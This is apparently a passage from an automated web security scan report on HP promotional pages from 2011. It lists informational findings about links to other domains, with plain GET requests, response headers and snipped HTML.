<a tabindex="22" href="http://www.facebook.com/HP">HP for Home Facebook Fanpage</a>
...[SNIP]...
<div class="community_social_text">
<a tabindex="22" href="http://twitter.com/#!/hpnews">Follow HP on Twitter</a>
...[SNIP]...
<div class="subfooter">
<a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4cca2f1844d48f49" class="addthis_button_compact at300m" title="This link will open in a new window or, depending on your browser settings, in a new tab" style="float: left; padding-right: 20px; padding-top: 6px;" target="_blank"><img src="../images/share2.jpg" alt="Share">
...[SNIP]...

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cca2f1844d48f49"></script>
...[SNIP]...
<div class="js_fb_like">
<a class="learn_more" target="_blank" href="http://www.facebook.com/help/?page=1068">Learn more about</a>
<iframe scrolling="no" frameborder="0" allowtransparency="true" style="border: medium none; overflow: hidden; width: 400px; height:40px;" id="HPlike" src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=false&width=460&action=like&font=verdana&colorscheme=dark&height=48&href=http://h41112.www4.hp.com/promo/webos/us/en/index.html?jumpid=ex_r10104_ww/en/hho/psg/us-hp-palm-launch-mu_chev/webos"></iframe>
...[SNIP]...
<br/>
<a class="link_metrics" href="http://www.hp.az" tabindex="180">Az..rbaycan</a>
...[SNIP]...
<br/>
<a class="link_metrics" href="http://www.hp.is" tabindex="180">Iceland</a>
...[SNIP]...
<br/>
<a class="link_metrics" href="http://www.hp.ma" tabindex="180">Maroc</a>
...[SNIP]...
<br/>
<a class="link_metrics" href="http://www.hp.md" tabindex="180">Moldova</a>
...[SNIP]...
<td align="left"><a href="http://www.bestbuy.com/site/Computers-Promotions/HP+Touchpad+Highlights/pcmcat241300050028.c?id=pcmcat241300050028" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: BestBuy');"><img src="images/partners/bby.png" border="0" alt="BestBuy" title="BestBuy" />
...[SNIP]...
<td align="left"><a href="http://www.staples.com/cat_SH40_SH40?nMXID=39703&nVID=7240393" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: Staples');"><img src="images/partners/staples.png" border="0" alt="Staples" title="Staples" />
...[SNIP]...
<td align="left"><a href="http://www.walmart.com/cp/1074084?nmxid=39704&nvid=7240393" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: Walmart');"><img src="images/partners/walmart.png" border="0" alt="Walmart" title="Walmart" />
...[SNIP]...
<td align="left"><a href="http://www.samsclub.com/hptouchpad" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: Sams');"><img src="images/partners/sams.png" border="0" alt="Sams" title="Sams" />
...[SNIP]...
<td align="left"><a href="http://www.officedepot.com/a/promo/pages/0426_hptablet/" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: Office Depot');"><img src="images/partners/od.png" border="0" alt="Office Depot" title="Office Depot" />
...[SNIP]...
<td align="left"><a href="http://www.costco.com/Browse/Product.aspx?Prodid=11657930" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: Costco');"><img src="images/partners/costco.png" border="0" alt="Costco" title="Costco" />
...[SNIP]...
<td align="left"><a href="http://www.amazon.com/hptouchpad" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: Amazon');"><img src="images/partners/amazon.png" border="0" alt="Amazon" title="Amazon" />
...[SNIP]...
<td align="left"><a href="http://www.nfm.com/Default.aspx?N=1114%204294967248&NE=1070&Ntt=&nMXID=39849&nVID=7240393" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: Nebraska Furniture Mart');"><img src="images/partners/nfm.png" border="0" alt="Nebraska Furniture Mart" title="Nebraska Furniture Mart" />
...[SNIP]...
<td align="left"><a href="http://www.newegg.com/hptouchpad" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: New Egg');"><img src="images/partners/newegg.png" border="0" alt="New Egg" title="New Egg" />
...[SNIP]...
<td align="left"><a href="http://www.pcrichard.com/custserv/content.jsp?pageName=HP&nmxid=39851&nVID=7240393" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: PC Richard');"><img src="images/partners/pcr.png" border="0" alt="PC Richard" title="PC Richard" />
...[SNIP]...
<td align="left"><a href="http://www.jr.com/promotion/hp.jsp?nMXID=39852&nVID=7240393" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-hho: J&R');"><img src="images/partners/jr.png" border="0" alt="J&R" title="J&R" />
...[SNIP]...
<span><a href="http://gem.compaq.com/gemstore/sites/public_sector/Touchpad/index.asp" style="font-size:12px; text-decoration:none; display: inline; text-height:11px; font-family: arial; color:#0CF; margin:0pt;">Pre-order for Goverment & Education ...</a>
...[SNIP]...
<td align="left"><a href="http://www.cdw.com/hptouchpad" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-smb: CDW');"><img src="images/partners/cdw.png" border="0" alt="CDW" title="CDW" />
...[SNIP]...
<td align="left"><a href="http://www.pcconnection.com/IPA/Shop/Product/Search.htm?term=HP%20TouchPad&DefSort=Y&findin=allproducts&SearchType=1" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-smb: PC Connection');"><img src="images/partners/pcce.png" border="0" alt="PC Connection" title="PC Connection" />
...[SNIP]...
<td align="left"><a href="http://www.pcmall.com/n/Overview/customPages-1950" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-smb: PC Mall');"><img src="images/partners/pcm.png" border="0" alt="PC Mall" title="PC Mall" />
...[SNIP]...
<td align="left"><a href="http://www.tigerdirect.com/sectors/campaigns/include/hp_touchPad.asp?srkey=HP%20Touchpad" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-smb: Tiger Direct');"><img src="images/partners/td.png" border="0" alt="Tiger Direct" title="Tiger Direct" />
...[SNIP]...
<td align="left"><a href="http://www.newegg.com/hptouchpad " onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-smb: New Egg');"><img src="images/partners/newegg.png" border="0" alt="New Egg" title="New Egg" />
...[SNIP]...
<td align="left"><a href="http://www.insight.com/touchpad" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-smb: Insight');"><img src="images/partners/insight.png" border="0" alt="Insight" title="Insight" />
...[SNIP]...
<td align="left"><a href="http://www.zones.com/hptouchpad" onClick="s_sendAnalyticsEvent('', 'hho|touchpad|us|en|Touchpad-smb: Zones');"><img src="images/partners/zones.png" border="0" alt="Zones" title="Zones" />
...[SNIP]...

<script type="text/javascript" src="http://welcome.hp-ww.com/country/us/en/js/metricsNAhhomktg.js"></script>
...[SNIP]...

9.15. http://h71036.www7.hp.com/hho/cache/308070-0-0-225-121.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h71036.www7.hp.com
Path:	/hho/cache/308070-0-0-225-121.html

Issue detail

The page was loaded from a URL containing a query string:

http://h71036.www7.hp.com/hho/cache/308070-0-0-225-121.html?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-boost_pc_p_11374/

The response contains the following links to other domains:

http://content.channelintelligence.com/scripts/ykb_popupWindow.js
http://hp.digitalriver.com/store/hpappli/en_US/DisplayProductDetailsPage/productID.182825700?jumpid=re_r602_tc_artgen_body_tc_may2010_performance-tune-up-service
http://welcome.hp-ww.com/cma/segment/ww/aquarius/metricsauq.js
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif
http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js
http://welcome.hp-ww.com/img/favicon.ico
http://welcome.hp-ww.com/img/hpweb_1-2_prnt_icn.gif
http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
http://welcome.hp-ww.com/img/s.gif

Request

GET /hho/cache/308070-0-0-225-121.html?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-boost_pc_p_11374/ HTTP/1.1
Host: h71036.www7.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 39416
Content-Type: text/html
Last-Modified: Mon, 14 Mar 2011 16:26:39 GMT
Accept-Ranges: bytes
ETag: "5bcfd69864e2cb1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 30 Jun 2011 11:50:24 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en-us">
<head>
<META http-equiv="Content-Type" content="text/html">
<title>H
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://content.channelintelligence.com/scripts/ykb_popupWindow.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
<link rel="shortcut icon" href="http://welcome.hp-ww.com/img/favicon.ico">
</head>
...[SNIP]...
<a href="#jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Jump to content" border="0"></a>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="24" alt="" border="0"></td>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt=""></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif" width="100" height="24" border="0" alt="HP.com Home"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://www.shopping.hp.com/webapp/shopping/home.do?jumpid=re_r602_tc_all_topnav_psg_dec09_productsservices"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif" width="166" height="24" border="0" alt="Products and Services"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/support.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif" width="163" height="24" border="0" alt="Support and Drivers"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/solutions.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif" width="143" height="24" border="0" alt="Solutions"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/howtobuy.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif" width="143" height="24" border="0" alt="How to Buy"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
...[SNIP]...
<td width="20" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="48" alt="" class="decoration"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<td valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt="" class="decoration"></td>
...[SNIP]...
<input type="text" name="qt" size="26" maxlength="100" id="textboxIDAHKXJY" alt="Enter search criteria here" value=""><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt=""><a id="country" onmouseover="status='search using the specified criteria';return true;" onmouseout="status='';return true;" onFocus="status='search using the specified criteria';return true;" onBlur="s
...[SNIP]...
<td align="left"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt="" class="decoration"></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="HP.com home" border="0"></a><br></td>
<td width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="93" alt=""></td>
<td width="370" align="left" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt=""><h1>
...[SNIP]...
<td width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td width="5"><img src="http://welcome.hp-ww.com/img/s.gif" width="5" height="1" alt=""></td>
...[SNIP]...
<font size="2%"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="15" alt="" class="decoration"><br>
...[SNIP]...
<br><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="30" alt="" class="decoration"></font>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="120"><img src="http://welcome.hp-ww.com/img/s.gif" width="120" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3" class="colorCCCCCCbg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<a name="jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Content starts here"></a>
...[SNIP]...
</table><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""><br>
...[SNIP]...
<td class="theme" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td class="colorE7E7E7bg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td class="colorE7E7E7bg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="5"><img src="http://welcome.hp-ww.com/img/s.gif" width="5" height="1" alt=""></td>
...[SNIP]...
<td colspan="2"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td></tr>
<tr>
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td height="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td class="theme"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td height="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<br/>
<a href="http://hp.digitalriver.com/store/hpappli/en_US/DisplayProductDetailsPage/productID.182825700?jumpid=re_r602_tc_artgen_body_tc_may2010_performance-tune-up-service"> »Button Text</a>
...[SNIP]...
<td height="30" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="center" valign="bottom" width="170" bgcolor="#F0F0F0"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_prnt_icn.gif" width="19" height="13" alt="" border="0"><a href="javascript:%20printable_version('external');" class="udrlinebold">
...[SNIP]...
<td width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" alt="" border="0">
<div class="textLevelC">
<img src="http://welcome.hp-ww.com/img/s.gif" width="560" height="10" alt="">

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/cma/segment/ww/aquarius/metricsauq.js"></script>
...[SNIP]...

9.16. http://h71036.www7.hp.com/hho/cache/309975-0-0-225-121.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h71036.www7.hp.com
Path:	/hho/cache/309975-0-0-225-121.html

Issue detail

The page was loaded from a URL containing a query string:

http://h71036.www7.hp.com/hho/cache/309975-0-0-225-121.html?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-coverage_f_11373/

The response contains the following links to other domains:

http://content.channelintelligence.com/scripts/ykb_popupWindow.js
http://welcome.hp-ww.com/cma/segment/ww/aquarius/metricsauq.js
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif
http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif
http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js
http://welcome.hp-ww.com/img/favicon.ico
http://welcome.hp-ww.com/img/hpweb_1-2_prnt_icn.gif
http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
http://welcome.hp-ww.com/img/s.gif

Request

GET /hho/cache/309975-0-0-225-121.html?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-coverage_f_11373/ HTTP/1.1
Host: h71036.www7.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 55097
Content-Type: text/html
Last-Modified: Mon, 27 Jun 2011 15:23:44 GMT
Accept-Ranges: bytes
ETag: "ad68f34de34cc1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 30 Jun 2011 11:50:24 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en-us">
<head>
<META http-equiv="Content-Type" content="text/html">
<title>H
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://content.channelintelligence.com/scripts/ykb_popupWindow.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
<link rel="shortcut icon" href="http://welcome.hp-ww.com/img/favicon.ico">
</head>
...[SNIP]...
<a href="#jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Jump to content" border="0"></a>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="24" alt="" border="0"></td>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt=""></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif" width="100" height="24" border="0" alt="HP.com Home"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://www.shopping.hp.com/webapp/shopping/home.do?jumpid=re_r602_tc_all_topnav_psg_dec09_productsservices"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif" width="166" height="24" border="0" alt="Products and Services"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/support.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif" width="163" height="24" border="0" alt="Support and Drivers"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/solutions.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif" width="143" height="24" border="0" alt="Solutions"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/howtobuy.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif" width="143" height="24" border="0" alt="How to Buy"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
...[SNIP]...
<td width="20" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="48" alt="" class="decoration"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<td valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt="" class="decoration"></td>
...[SNIP]...
<input type="text" name="qt" size="26" maxlength="100" id="textboxIDAANGU5" alt="Enter search criteria here" value=""><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt=""><a id="country" onmouseover="status='search using the specified criteria';return true;" onmouseout="status='';return true;" onFocus="status='search using the specified criteria';return true;" onBlur="s
...[SNIP]...
<td align="left"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt="" class="decoration"></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="HP.com home" border="0"></a><br></td>
<td width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="93" alt=""></td>
<td width="370" align="left" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt=""><h1>
...[SNIP]...
<td width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td width="5"><img src="http://welcome.hp-ww.com/img/s.gif" width="5" height="1" alt=""></td>
...[SNIP]...
<font size="2%"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="15" alt="" class="decoration"><br>
...[SNIP]...
<br><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="30" alt="" class="decoration"></font>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="120"><img src="http://welcome.hp-ww.com/img/s.gif" width="120" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3" class="colorCCCCCCbg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<a name="jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Content starts here"></a>
...[SNIP]...
<td class="theme" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td class="colorE7E7E7bg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td class="colorE7E7E7bg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<img src="/hho/images/237hp09-ADP-CTA.jpg" width="272" height="110" alt="Call 866-234-1377 or click below to purchase your HP Accidental Damage Protection Plan today." border="0">
<img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""><br>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="2"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td></tr>
<tr><td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="2"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt=""></td>
...[SNIP]...
<td class="theme"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
